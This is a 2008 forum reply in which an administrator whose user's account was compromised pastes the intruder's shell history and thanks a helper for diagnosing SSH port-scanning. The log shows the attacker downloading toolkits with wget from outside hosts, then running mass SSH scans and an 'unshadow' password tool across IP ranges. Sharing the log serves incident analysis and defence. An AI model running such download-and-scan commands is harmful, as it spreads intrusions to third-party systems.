Thread: Possible attack?
View Single Post
  #11 (permalink)  
Old 09-19-2008, 08:15 PM
Anon E. Muss
Guest
  
Posts: n/a
Default Re: Possible attack?
On Fri, 19 Sep 2008 17:17:13 +0000 (UTC), Sylvain Robitaille
<syl@alcor.concordia.ca> wrote:

>Anon E Muss wrote:
>
>> Below is most of output of netstat. Can someone let me know what is
>> going on here?

[...]

>Your machine is port-scanning what appears to be 218.0.0.0/11 for ssh
>servers. You need to make it stop that. If you blocked 201/8
>yesterday, and 218/8 today, you might want to try to find what data it
>gathered in the meantime for 202/8 to 217/8. More seriously, you need
>to identify the process that is performing the scan, and stop it. Then
>you need to figure out how it got there and deal with that.
>
>> ... any suggestions??
>
>Look for a probable compromise by similar means. Judging by the
>client-side ports (on your system) used in the scan, I don't think that
>a privileged account was compromised (and therefore your system itself
>is probably not compromised, unless the compromised account was able to
>use local privilege escalation). Another frequent source of account
>compromise seems to be some web-based services.

One of my users had a stupid password and had his account compromised.
Upon reviewing the logs, it looks like this was going on for about 4
days:

$ cat .bash_history

[...]
passwd
w
uname -a
cat /proc/cpuinfo
ls -a
uptime
cat /proc/cpuinfo
w
ls -a
w
uanme -a
uname -a
ls -a
w
uname -a
ps -x
w
ls -a
wget http://www12.asphost4free.com/marmy/ssh.tgz
tar zxvf ssh.tgz
rm -rf ssh.tgz
cd ssh
chmod +x *
wget http://nasa-undernet.ucoz.org/screen.tgz
tar zxvf screen.tgz
rm -rf screen.tgz
chmod +x *
screen -r
screen
../mass 117
cd ssh
../screen -r
ls -a
ps x
kill -9 12305
nano vuln.txt
ps x
ls -a
cd ..
rm -rf ssh
ls -a
w
ls -a
uname -a
cat /proc/cpuinfo
ls -a
uname -a
uptime
ps x
cat /proc/cpuinfo
ls -a
cat /proc/cpuinfo
ftp 61.184.136.12
ftp 61.184.136.12
tar zxvf webmin.tgz
cd webmin
../scan 79.15
../scan 91.80
../scan 161.53
../unshadow 161.53/
../scan 200.168
../unshadow 200.168/
../scan 201.10
../scan 202.66
../scan 92.114
../unshadow 92.114
cd
ls
cd webmin
ls
cd
wget http://www12.asphost4free.com/marmy/ssh.tgz
tar zxvf ssh.tgz
cd ssh
http://www12.asphost4free.com/mrtiger/screen.tgz
wget http://www12.asphost4free.com/mrtiger/screen.tgz
tar zxvf screen.tgz
rm -rf screen.tgz
../screen
../mass 61
../screen
w
passwd
w
uname -a
cat /proc/cpuinfo
uname -a
w
cat /proc/cpuinfo
ls -a
cd webmin
ls -a
../scan 69.13
../unshadow 69.13/
w
ls -a
cd ssh
ls -a
cat vuln.txt
cd ..
cd webmin
../scan 82.146
ls -a
cd ..
ls -a
cd ssh
ls -a
screen
w
ls -a
cd ssh
ls -a
../screen -r
screen -wipe
cat culn.txt
cat vuln.txt
ls -a
../screen
w
ls -a
cd ssh
../screen -r
cat vuln.txt
cd ssh
../screen -r
cat vuln.txt
cd ssh
cat vuln.txt
screen -r
ps x
../screen -r
../mass 62
../mass 61
cd ssh
cat vuln.txt
screen -r
../screen -r
../screen -wipe
../screen
ls -a
cd ssh
../screen -r
cat vuln.txt
../screen -r
cat vuln.txt
../mass 201
cd ssh
../screen -r
cat vuln.txt
ls +a
../screen
cd ssh
cat vuln.txt
screen -r
../screen -r
../screen -r
../screen -r
cd ..
ls -a
wget joke4u.diinoweb.com/files/Cristina.tgz
rm -rf Cristina.tgz
cd ssh
../screen -r
../mass 218
cd ssh
../screen -r
[...]

>I hope I've helped ...

You did. Thanks.

I also installed "fail2ban" as someone else advised.

Reply With Quote